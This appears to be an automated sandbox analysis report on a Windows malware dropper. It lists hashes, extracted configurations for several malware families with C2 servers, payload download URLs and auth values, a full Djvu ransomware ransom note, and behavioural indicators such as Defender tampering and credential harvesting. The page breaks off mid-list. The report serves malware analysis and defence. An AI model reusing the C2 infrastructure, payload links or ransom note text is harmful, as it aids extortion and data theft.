djvu | b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99

Analysis

max time kernel
152s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-03-2022 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe
Size

9.0MB
MD5

dd92370573cba60d0445c507faa952f7
SHA1

603e53d171b7e306f82109648137c7d28dcbac5c
SHA256

b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99
SHA512

31f96db259304c5af5807492622d28d1065d151830a295fa5d47e07dbdda39c17f3da9489ea756d27976afea976259575b1e9a2d1a2aaed651801300e3e4c80d

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

da da

86.107.197.196:63065

Attributes

auth_value
9b1654b30797c210c85bd0890936a5b9

Extracted

Family

vidar

Version

50.7

Botnet

1177

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
1177

Extracted

Family

redline

5.206.224.220:81

Attributes

auth_value
4330eefe7c0f986c945c8babe3202f28

Extracted

Family

redline

Botnet

ruzki14_03

176.122.23.55:11768

Attributes

auth_value
13b742acfe493b01c5301781c98d3fbe

Extracted

Family

redline

Botnet

pizzadlyath

65.108.101.231:14648

Attributes

auth_value
e6050567aab45ec7a388fed4947afdc2

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe

http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5108-334-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5108-343-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5108-328-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5108-324-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4188-172-0x0000000005280000-0x0000000005BA6000-memory.dmp	family_glupteba
behavioral2/memory/4188-173-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/4184-185-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral2/memory/2280-189-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4888 4512 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	4512	rUNdlL32.eXe

RedLine Payload 17 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1900-235-0x00000000009C0000-0x00000000009E0000-memory.dmp	family_redline
behavioral2/memory/3988-246-0x0000000000540000-0x00000000006C5000-memory.dmp	family_redline
behavioral2/memory/4048-249-0x0000000000890000-0x0000000000A15000-memory.dmp	family_redline
behavioral2/memory/4048-263-0x0000000000890000-0x0000000000A15000-memory.dmp	family_redline
behavioral2/memory/4048-260-0x0000000000890000-0x0000000000A15000-memory.dmp	family_redline
behavioral2/memory/4756-303-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3988-248-0x0000000000540000-0x00000000006C5000-memory.dmp	family_redline
behavioral2/memory/4048-244-0x0000000000890000-0x0000000000A15000-memory.dmp	family_redline
behavioral2/memory/2560-325-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3368-310-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3988-234-0x0000000000540000-0x00000000006C5000-memory.dmp	family_redline
behavioral2/memory/3988-231-0x0000000000540000-0x00000000006C5000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\StKv78jSkNijWpJNIcVwxxO0.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\StKv78jSkNijWpJNIcVwxxO0.exe	family_redline
behavioral2/memory/3256-345-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3496-323-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4956-320-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 3744 created 4188 3744 svchost.exe Info.exe
PID 3744 created 2280 3744 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 3744 created 4188	3744	svchost.exe	Info.exe
PID 3744 created 2280	3744	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4876-281-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger
behavioral2/memory/4876-279-0x00000000020A0000-0x00000000020E4000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2120-256-0x0000000000560000-0x000000000080A000-memory.dmp	family_vidar
behavioral2/memory/2120-270-0x0000000000560000-0x000000000080A000-memory.dmp	family_vidar
behavioral2/memory/2120-261-0x0000000000560000-0x000000000080A000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 48 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeFile.exeInstall.exepub2.exeFiles.exejfiag3g_gg.exeFolder.exejfiag3g_gg.exeInfo.execsrss.exe6mviJ7aR7Iu4WIcfMy0NvNI_.exeXZgF1kubuwTPgORKbwIWc8XF.exexcoJgJ3jOwvOCYaZ9aHe2a_S.exeKEfmETAgqNAdVCVc4XRw9Pj7.exe50O8cmP5d_ZXcqw1zH_vtZEp.exeinjector.exe9ey2mXouwzaXLg9RlD5o3jbo.exet5xN8B6ioDdfpRJf6isCyntE.exeNIRcHNTRudugx7nWthADgbVt.execD9FlfWbZ9sd_NRTN8AYFKRo.exeeh1l25nRy0rFGrLRC3H466bT.exekw4MySvRV6v7vRzbdqtN4Srw.exeinjector.exeBg8dhj9h9WN9iL5rxRrqPg3T.exeWerFault.exeStKv78jSkNijWpJNIcVwxxO0.exeWerFault.exeinjector.exeLT4tmxErVD5_zzxX9XB9YITt.exeQjIdtMD1evPtZva6j3tHAkvA.exeXV0pxvfNqW38gHNH_S2xxNxI.exereg.exe9a2Ng614z6bhLGCrzLYAfNAQ.exeE_NWOTcfVYLaV_wZ5zpEF9UT.exedBfm08dp7tr2snWCrtPvFaXq.exeInstall.exeNIRcHNTRudugx7nWthADgbVt.exeInstall.exeemhfdsnc.exezfnvaixm.exeSta.exe.pifZtfglzprim.exedBfm08dp7tr2snWCrtPvFaXq.exeSta.exe.pif

pid	process
2376	SoCleanInst.exe
3468	md9_1sjm.exe
3428	Folder.exe
4188	Info.exe
4284	Updbdate.exe
1672	File.exe
1292	Install.exe
3552	pub2.exe
3516	Files.exe
812	jfiag3g_gg.exe
4324	Folder.exe
2100	jfiag3g_gg.exe
4184	Info.exe
2280	csrss.exe
4724	6mviJ7aR7Iu4WIcfMy0NvNI_.exe
2228	XZgF1kubuwTPgORKbwIWc8XF.exe
3696	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
4988	KEfmETAgqNAdVCVc4XRw9Pj7.exe
4876	50O8cmP5d_ZXcqw1zH_vtZEp.exe
4780	injector.exe
1908	9ey2mXouwzaXLg9RlD5o3jbo.exe
4852	t5xN8B6ioDdfpRJf6isCyntE.exe
4628	NIRcHNTRudugx7nWthADgbVt.exe
4292	cD9FlfWbZ9sd_NRTN8AYFKRo.exe
4836	eh1l25nRy0rFGrLRC3H466bT.exe
3988	kw4MySvRV6v7vRzbdqtN4Srw.exe
1120	injector.exe
956	Bg8dhj9h9WN9iL5rxRrqPg3T.exe
4596	WerFault.exe
1900	StKv78jSkNijWpJNIcVwxxO0.exe
4540	WerFault.exe
1960	injector.exe
1512	LT4tmxErVD5_zzxX9XB9YITt.exe
4048	QjIdtMD1evPtZva6j3tHAkvA.exe
1032	XV0pxvfNqW38gHNH_S2xxNxI.exe
2120	reg.exe
3828	9a2Ng614z6bhLGCrzLYAfNAQ.exe
1772	E_NWOTcfVYLaV_wZ5zpEF9UT.exe
3208	dBfm08dp7tr2snWCrtPvFaXq.exe
4576	Install.exe
5108	NIRcHNTRudugx7nWthADgbVt.exe
2364	Install.exe
2568	emhfdsnc.exe
1020	zfnvaixm.exe
4168	Sta.exe.pif
1744	Ztfglzprim.exe
3156	dBfm08dp7tr2snWCrtPvFaXq.exe
1912	Sta.exe.pif

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\cD9FlfWbZ9sd_NRTN8AYFKRo.exe	upx
C:\Users\Admin\Pictures\Adobe Films\cD9FlfWbZ9sd_NRTN8AYFKRo.exe	upx

Checks BIOS information in registry 2 TTPs 13 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeBg8dhj9h9WN9iL5rxRrqPg3T.exeLT4tmxErVD5_zzxX9XB9YITt.exeInstall.exexcoJgJ3jOwvOCYaZ9aHe2a_S.exeWerFault.exeXV0pxvfNqW38gHNH_S2xxNxI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bg8dhj9h9WN9iL5rxRrqPg3T.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bg8dhj9h9WN9iL5rxRrqPg3T.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LT4tmxErVD5_zzxX9XB9YITt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XV0pxvfNqW38gHNH_S2xxNxI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XV0pxvfNqW38gHNH_S2xxNxI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LT4tmxErVD5_zzxX9XB9YITt.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Folder.exeFile.exe9ey2mXouwzaXLg9RlD5o3jbo.exet5xN8B6ioDdfpRJf6isCyntE.exeemhfdsnc.exeb993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exedBfm08dp7tr2snWCrtPvFaXq.exeInstall.exe50O8cmP5d_ZXcqw1zH_vtZEp.exe9a2Ng614z6bhLGCrzLYAfNAQ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	9ey2mXouwzaXLg9RlD5o3jbo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	t5xN8B6ioDdfpRJf6isCyntE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	emhfdsnc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	dBfm08dp7tr2snWCrtPvFaXq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	50O8cmP5d_ZXcqw1zH_vtZEp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	9a2Ng614z6bhLGCrzLYAfNAQ.exe

Loads dropped DLL 11 IoCs

Processes:

rundll32.exereg.exet5xN8B6ioDdfpRJf6isCyntE.exeSta.exe.pif

pid	process
4596	rundll32.exe
2120	reg.exe
2120	reg.exe
4852	t5xN8B6ioDdfpRJf6isCyntE.exe
4852	t5xN8B6ioDdfpRJf6isCyntE.exe
4168	Sta.exe.pif
4168	Sta.exe.pif
4168	Sta.exe.pif
4168	Sta.exe.pif
4168	Sta.exe.pif
4168	Sta.exe.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe9a2Ng614z6bhLGCrzLYAfNAQ.exedBfm08dp7tr2snWCrtPvFaXq.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AgedDust = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lkpyatdj = "\"C:\\Users\\Admin\\emhfdsnc.exe\""	9a2Ng614z6bhLGCrzLYAfNAQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bzoggjad = "\"C:\\Users\\Admin\\AppData\\Roaming\\Trcysqsq\\Bzoggjad.exe\""	dBfm08dp7tr2snWCrtPvFaXq.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

md9_1sjm.exexcoJgJ3jOwvOCYaZ9aHe2a_S.exeBg8dhj9h9WN9iL5rxRrqPg3T.exeLT4tmxErVD5_zzxX9XB9YITt.exeXV0pxvfNqW38gHNH_S2xxNxI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Bg8dhj9h9WN9iL5rxRrqPg3T.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LT4tmxErVD5_zzxX9XB9YITt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XV0pxvfNqW38gHNH_S2xxNxI.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

104 ipinfo.io
107 api.db-ip.com
108 api.db-ip.com
210 ipinfo.io
211 ipinfo.io
213 api.db-ip.com
17 ip-api.com
103 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

kw4MySvRV6v7vRzbdqtN4Srw.exeQjIdtMD1evPtZva6j3tHAkvA.exereg.exe

pid process

3988 kw4MySvRV6v7vRzbdqtN4Srw.exe
4048 QjIdtMD1evPtZva6j3tHAkvA.exe
2120 reg.exe

flow	ioc
104	ipinfo.io
107	api.db-ip.com
108	api.db-ip.com
210	ipinfo.io
211	ipinfo.io
213	api.db-ip.com
17	ip-api.com
103	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
3988	kw4MySvRV6v7vRzbdqtN4Srw.exe
4048	QjIdtMD1evPtZva6j3tHAkvA.exe
2120	reg.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

xcoJgJ3jOwvOCYaZ9aHe2a_S.exeWerFault.exeNIRcHNTRudugx7nWthADgbVt.exeWerFault.exeBg8dhj9h9WN9iL5rxRrqPg3T.exeLT4tmxErVD5_zzxX9XB9YITt.exeXV0pxvfNqW38gHNH_S2xxNxI.exezfnvaixm.exedBfm08dp7tr2snWCrtPvFaXq.exeSta.exe.pif

description	pid	process	target process
PID 3696 set thread context of 4756	3696	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe	AppLaunch.exe
PID 4596 set thread context of 3368	4596	WerFault.exe	AppLaunch.exe
PID 4628 set thread context of 5108	4628	NIRcHNTRudugx7nWthADgbVt.exe	NIRcHNTRudugx7nWthADgbVt.exe
PID 4540 set thread context of 4956	4540	WerFault.exe	AppLaunch.exe
PID 956 set thread context of 3496	956	Bg8dhj9h9WN9iL5rxRrqPg3T.exe	AppLaunch.exe
PID 1512 set thread context of 2560	1512	LT4tmxErVD5_zzxX9XB9YITt.exe	AppLaunch.exe
PID 1032 set thread context of 3256	1032	XV0pxvfNqW38gHNH_S2xxNxI.exe	AppLaunch.exe
PID 1020 set thread context of 2564	1020	zfnvaixm.exe	svchost.exe
PID 3208 set thread context of 3156	3208	dBfm08dp7tr2snWCrtPvFaXq.exe	dBfm08dp7tr2snWCrtPvFaXq.exe
PID 4168 set thread context of 1912	4168	Sta.exe.pif	Sta.exe.pif

Drops file in Program Files directory 2 IoCs

Processes:

XZgF1kubuwTPgORKbwIWc8XF.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XZgF1kubuwTPgORKbwIWc8XF.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XZgF1kubuwTPgORKbwIWc8XF.exe

Drops file in Windows directory 3 IoCs

Processes:

Info.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4244	4596	WerFault.exe	rundll32.exe
3980	4188	WerFault.exe	Info.exe
3744	4188	WerFault.exe	Info.exe
3500	4188	WerFault.exe	Info.exe
3792	4188	WerFault.exe	Info.exe
1508	4188	WerFault.exe	Info.exe
3172	4188	WerFault.exe	Info.exe
2484	4188	WerFault.exe	Info.exe
4324	4188	WerFault.exe	Info.exe
1680	4188	WerFault.exe	Info.exe
648	4188	WerFault.exe	Info.exe
2492	4188	WerFault.exe	Info.exe
1900	4188	WerFault.exe	Info.exe
1960	4188	WerFault.exe	Info.exe
4308	4188	WerFault.exe	Info.exe
3536	4188	WerFault.exe	Info.exe
2100	4188	WerFault.exe	Info.exe
3440	4188	WerFault.exe	Info.exe
1188	4188	WerFault.exe	Info.exe
1108	4188	WerFault.exe	Info.exe
4104	4188	WerFault.exe	Info.exe
4592	4188	WerFault.exe	Info.exe
2408	4184	WerFault.exe	Info.exe
1048	4184	WerFault.exe	Info.exe
4248	4184	WerFault.exe	Info.exe
4520	4184	WerFault.exe	Info.exe
3788	4184	WerFault.exe	Info.exe
1328	4184	WerFault.exe	Info.exe
4084	4184	WerFault.exe	Info.exe
876	4184	WerFault.exe	Info.exe
1104	4184	WerFault.exe	Info.exe
4776	4184	WerFault.exe	Info.exe
1652	4184	WerFault.exe	Info.exe
4784	4184	WerFault.exe	Info.exe
3148	4184	WerFault.exe	Info.exe
4256	4184	WerFault.exe	Info.exe
4300	4184	WerFault.exe	Info.exe
2876	4184	WerFault.exe	Info.exe
3004	4184	WerFault.exe	Info.exe
3184	2280	WerFault.exe	csrss.exe
1396	2280	WerFault.exe	csrss.exe
2728	2280	WerFault.exe	csrss.exe
2236	2280	WerFault.exe	csrss.exe
4788	2280	WerFault.exe	csrss.exe
3468	2280	WerFault.exe	csrss.exe
648	2280	WerFault.exe	csrss.exe
2996	2280	WerFault.exe	csrss.exe
4244	2280	WerFault.exe	csrss.exe
2436	2280	WerFault.exe	csrss.exe
2620	2280	WerFault.exe	csrss.exe
1048	2280	WerFault.exe	csrss.exe
4316	2280	WerFault.exe	csrss.exe
680	2280	WerFault.exe	csrss.exe
400	2280	WerFault.exe	csrss.exe
808	2280	WerFault.exe	csrss.exe
3616	2280	WerFault.exe	csrss.exe
1552	2280	WerFault.exe	csrss.exe
4432	2280	WerFault.exe	csrss.exe
1216	2280	WerFault.exe	csrss.exe
4260	2280	WerFault.exe	csrss.exe
812	2280	WerFault.exe	csrss.exe
1388	2280	WerFault.exe	csrss.exe
1876	2280	WerFault.exe	csrss.exe
824	2280	WerFault.exe	csrss.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exeZtfglzprim.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ztfglzprim.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ztfglzprim.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Ztfglzprim.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exet5xN8B6ioDdfpRJf6isCyntE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	t5xN8B6ioDdfpRJf6isCyntE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	t5xN8B6ioDdfpRJf6isCyntE.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
